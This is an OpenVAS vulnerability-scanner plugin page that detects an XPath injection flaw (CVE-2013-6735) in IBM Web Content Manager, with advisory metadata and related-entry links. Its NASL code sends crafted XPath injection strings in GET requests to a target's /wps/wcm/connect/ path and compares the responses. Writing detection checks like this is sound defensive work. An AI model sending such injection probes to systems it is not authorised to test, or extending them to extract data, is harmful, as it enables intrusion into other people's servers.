Lucene search
Copyright (C) 2014 Greenbone AGOPENVAS:1361412562310103882HistoryJan 15, 2014 - 12:00 a.m.
IBM Web Content Manager 'LIBRARY' Parameter XPath Injection Vulnerability
2014-01-1500:00:00
Copyright (C) 2014 Greenbone AG
plugins.openvas.org
26
IBM Web Content Manager is prone to an XPath-injection vulnerability.
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103882");
script_cve_id("CVE-2013-6735");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_version("2023-07-27T05:05:08+0000");
script_name("IBM Web Content Manager 'LIBRARY' Parameter XPath Injection Vulnerability");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/64496");
script_xref(name:"URL", value:"https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20131227-0_IBM_WCM_XPath_Injection_v10.txt");
script_tag(name:"last_modification", value:"2023-07-27 05:05:08 +0000 (Thu, 27 Jul 2023)");
script_tag(name:"creation_date", value:"2014-01-15 16:11:31 +0100 (Wed, 15 Jan 2014)");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_analysis");
script_family("Web application abuses");
script_copyright("Copyright (C) 2014 Greenbone AG");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"impact", value:"An attacker can exploit this issue by manipulating the XPath query
logic to carry out unauthorized actions on the application.");
script_tag(name:"vuldetect", value:"Send some special crafted HTTP GET requests and check the response.");
script_tag(name:"insight", value:"Due to insufficient validation, the 'LIBRARY' element suffers from an
XPath-injection vulnerability.
An unauthenticated user is able to perform blind XPath Injection attacks e.g.
get current application configuration, enumerate nodes and extract other
valuable information from vulnerable installations of Web Content Manager.");
script_tag(name:"solution", value:"Updates are available. Please see the references or vendor advisory
for more information.");
script_tag(name:"summary", value:"IBM Web Content Manager is prone to an XPath-injection vulnerability.");
script_tag(name:"affected", value:"IBM WebSphere Portal 6.0.0.x through 6.0.0.1,
6.0.1.x through 6.0.1.7,
6.1.0.x through 6.1.0.6 CF27,
6.1.5.x through 6.1.5.3 CF27,
7.0.0.x through 7.0.0.2 CF26,
8.0.0.x through 8.0.0.1 CF08");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("port_service_func.inc");
port = http_get_port( default:80 );
url = "/wps/wcm/connect/%27%20or%20%27a%27%3d%27b";
req = http_get( item:url, port:port );
buf = http_send_recv( port:port, data:req, bodyonly:FALSE );
if( buf !~ "HTTP/1\.. 404" ) exit (0);
url = "/wps/wcm/connect/%27%20or%20%27a%27%3d%27a";
req = http_get( item:url, port:port );
buf = http_send_recv( port:port, data:req, bodyonly:FALSE );
if( buf =~ "HTTP/1\.. 302" && buf =~ 'Location:.*/wps/wcm/webinterface/login/login.jsp' )
{
security_message( port:port );
exit(0);
}
exit (99);
Related
prion
prion
Code injection
2013-12-22 15:16:00
cvelist
cvelist
CVE-2013-6735
2013-12-22 15:00:00
securityvulns
securityvulns
SEC Consult SA-20131227-0 :: IBM Web Content Manager (WCM) XPath Injection
2014-01-09 00:00:00
IBM Web Content Manager information leakage
2014-01-09 00:00:00
packetstorm
packetstorm
IBM Web Content Manager XPath Injection
2013-12-27 00:00:00
cve
cve
CVE-2013-6735
2013-12-22 15:16:00
6.4 Medium
AI Score
Confidence
Low
0.004 Low
EPSS
Percentile
74.0%
Related for OPENVAS:1361412562310103882